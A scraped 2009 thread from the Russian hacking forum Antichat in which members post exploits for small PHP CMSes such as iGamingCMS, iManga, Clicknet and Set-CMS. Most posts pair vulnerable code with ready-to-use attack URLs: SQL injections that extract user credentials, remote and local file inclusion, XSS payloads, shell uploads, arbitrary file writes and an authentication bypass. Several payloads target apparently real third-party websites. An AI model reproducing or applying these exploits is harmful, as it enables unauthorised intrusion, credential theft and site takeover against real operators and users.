Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.10.2009, 15:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
OneFileCMS
Обход авторизацаии
На серваке, в общем /tmp
Создаем сесию, например:
sess_blablabla
Код:
onefilecms_valid|s:1:"1";
chmod 777 sess_blablabla
Вставляем куку в браузер:
И используем багу чтобы прочитать пароли:
http://host/onefile/onefilecms.php?f= onefilecms.php
File upload:
http://host/onefile/onefilecms.php?p=upload&i=new/
__________________
BlackHat. MoDL
|
|
|
25.10.2009, 11:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
ShopOS
2.4.2
не знаю как назвать  типа
PHP код:
...
$filename = $_GET['f'];
...
$fp = fopen($filename, 'w');
fwrite($fp, $content);
fclose($fp);
http://site/google_sitemap.php?f=index.php
в итоге у нас файл index.php примет код
PHP код:
<?xml version='1.0' encoding='UTF-8'?>
<urlset xmlns="http://www..com/schemas/sitemap/0.84"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www..com/schemas/sitemap/0.84
http://www.google.com/schemas/sitemap/0.84/sitemap.xsd">
<url>
<loc>http://127.0.0.1/upload444/index.php?cat=1</loc>
<priority>1.0</priority>
<lastmod>2010-01-01T01:01:01+03:00</lastmod>
<changefreq>weekly</changefreq>
</url>
....
__http://www.vale4ka.org.ua/google_sitemap.php?f=ir.php
__http://www.vale4ka.org.ua/ir.php
Код:
Parse error: syntax error, unexpected T_STRING in /var/www/ir.php on line 1
в 2.4.3
это файл xml_sitemap.php
Последний раз редактировалось HAXTA4OK; 25.10.2009 в 11:36..
|
|
|
|
25.10.2009, 23:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
ClipShare вроде 4.0
Пассивная XSS 
/tags/123%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E
/search/?search_id=%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E&search_type=search_videos&x=0&y=0
|
|
|
|
28.10.2009, 14:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iGamingCMS1.5
SQL
Файл reviews.php
PHP код:
$review = $db->Execute(" SELECT * FROM `sp_reviews` WHERE sp_reviews.id = '{$_REQUEST['id']}';");
__http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13+--+
_http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3, 4,5,6,7,8,9,10,11,12,13+from+sp_members+--+
ЗЫ префикс у них sp_
Blind-sql
Файл gamedetails.php
PHP код:
$result = $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST[id]' LIMIT 1");
__http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)= 5
PS там еще есть фалики с типа таким же запросом
RFI/shell
в админке Файл loadplugin.php
PHP код:
require_once("$_REQUEST[load]");
необходимо
allow_url_include = on
MQ= off
http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt?
2) способ залития шелла
Файл template_editor.php
PHP код:
if ($myfilehandle=@fopen('../templates/' . $_REQUEST['filename'],'w')) { if (get_magic_quotes_gpc()) { $editbuffer = stripslashes($editbuffer); } fputs($myfilehandle,$editbuffer); fclose($myfilehandle); echo "Saved OK";
по сути
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php
там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php
(ну или в один из инклудившихся файлов писать код)
и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла
Последний раз редактировалось HAXTA4OK; 29.10.2009 в 23:19..
|
|
|
|
30.10.2009, 09:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
PHMe
LFI
файл www.php
PHP код:
$currentFile = 'www.php'; require_once('con-fig/site_info.php'); require_once('con-fig/theme_info.php'); require_once("themes/{$Tdir}/top.php"); require_once('resources/function_list.php'); require_once("themes/{$Tdir}/bottom.php");
Файл resources/function_list.php
PHP код:
require('resources/mod/'.$_GET['action'].'.php');
http://localhost/phme/www.php?action=../../admin~/untitled
|
|
|
|
30.10.2009, 21:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iXon CMS
SQL
Уже по ходу любимый файл Rss.php
PHP код:
...
$id = $_GET['id'];
$post_data = get_all_post_data($id);
..
$result = mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC"); while ($comments = mysql_fetch_array($result))
...?>
http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex( version())),9,10--
ну и вроде в инете видел что было выложено LFI
банальное раскрытие путей как с htmlspecialchars
PHP код:
$redirect = 'login-control.php?redirect_to='.urlencode($_GET['redirect_to']);
http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=
urlencode() expects parameter 1 to be string, array given in C:\AppServ\www\iXon_CMS 0.30 Beta\ixon-admin\login.php on line 35
Последний раз редактировалось HAXTA4OK; 30.10.2009 в 21:45..
|
|
|
|
31.10.2009, 06:33
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
The Hablator chat
Раскрытие путей
В Cookies
|
|
|
|
31.10.2009, 09:10
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Set-CMS
Оффициальная страничка
Активная XSS
Модуль гостевая книга
PHP код:
if ($mc == "ok")
{
$title = "Сохранение сообщения";
if (isset($_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";}
if (isset($_POST['user_name'])){setcookie("user_name", $_POST['user_name'], time()+333333333);}
if (isset($_POST['user_email'])){setcookie("user_email", $_POST['user_email'], time()+333333333);}
if (isset($_POST['user_icq'])){setcookie("user_icq", $_POST['user_icq'], time()+333333333);}
if (isset($_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];}
if (isset($_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];}
if (isset($_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];}
$text_gb = saveuser($_POST['user_text']);
$name = saveuser($_POST['user_name']);
$email = saveuser($_POST['user_email']);
$icq = saveuser($_POST['user_icq']);
$code = $_POST['code'];
if ($code == "") { $er[] = "Нет кода!"; }
$ffile = file("files/feedback.set");
for($a=0;$a<count($ffile);$a++) {
$ee = explode("<>", $ffile[$a]);
if ($ee[5] == $code)
{ $er[] = "Флудишь,мля!Отправлено только одно сообщение"; }
}
В поле "Ваше имя" вставляем
"><script>alert();</script>
Эта же бага встречается в комментариях к новостям.
Тоже поле имя.
Раскрытие путей
Раскрытие путей с помощью PHPSESSID
Думаю обьяснения не нужны.
Пассивная XSS
/?set=news&mc=readfull&do=1"><script>alert();</script>
Последний раз редактировалось Ctacok; 31.10.2009 в 09:15..
|
|
|
|
31.10.2009, 09:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iManga_v0.3
SQL
Файл showcomments.php
PHP код:
$postid = $_GET['postid'];
$post = mysql_query("SELECT * FROM `" . $global['prefix'] . "news` WHERE id=" . $postid);
$post = mysql_fetch_array($post);
http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,version(),3,4,5--
http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,concat_Ws(0x3a,username,password) ,3,4,5+from+users--
ЗАливка шелла
в админке http://localhost/iManga_v0.3/upload/admin/postcomic.php
PHP код:
$target_path = "../comics/" . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path))
{echo "<strong>The comic was successfully uploaded.</strong>\n<br /><br />";
http://localhost/iManga_v0.3/upload/comics/shell.php
|
|
|
|
03.11.2009, 18:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Clicknet_CMS_v2.1
Чтение файлов
MQ=off
register_globals= on
Файл menu.php
PHP код:
<?php
$menufil = $_SERVER["DOCUMENT_ROOT"] . $lokal . "menus/$indhold[2].php";
$menuitems = file($menufil);
http://localhost/Clicknet_CMS_v2.1/plugins/menu.php?lokal=/путь/до/файла/admin/htpasswd
LFI
Файл index.php
MQ=off
register_globals= on
PHP код:
...
$lokal = $content;
} else {
$lokal = "/";
}
...
include($_SERVER["DOCUMENT_ROOT"] . $lokal . "count.php");
http://localhost/Clicknet_CMS_v2.1/index.php?content=/путь/до/файла%00
Файл head.php
PHP код:
if ($indhold[2])
{ echo "<td width=\"150\" valign=\"top\">\n"; include($_SERVER["DOCUMENT_ROOT"] . $lokal . "plugins/menu.php");
echo "</td>\n";
http://localhost/Clicknet_CMS_v2.1/head.php?indhold[2]=1&lokal=/путь/до/файла%00
Файл foot.php
PHP код:
include($_SERVER["DOCUMENT_ROOT"] . $lokal . "sys/fodnote.php");
http://localhost/Clicknet_CMS_v2.1/foot.php?lokal=/путь/до/файла%00
Последний раз редактировалось HAXTA4OK; 03.11.2009 в 18:30..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
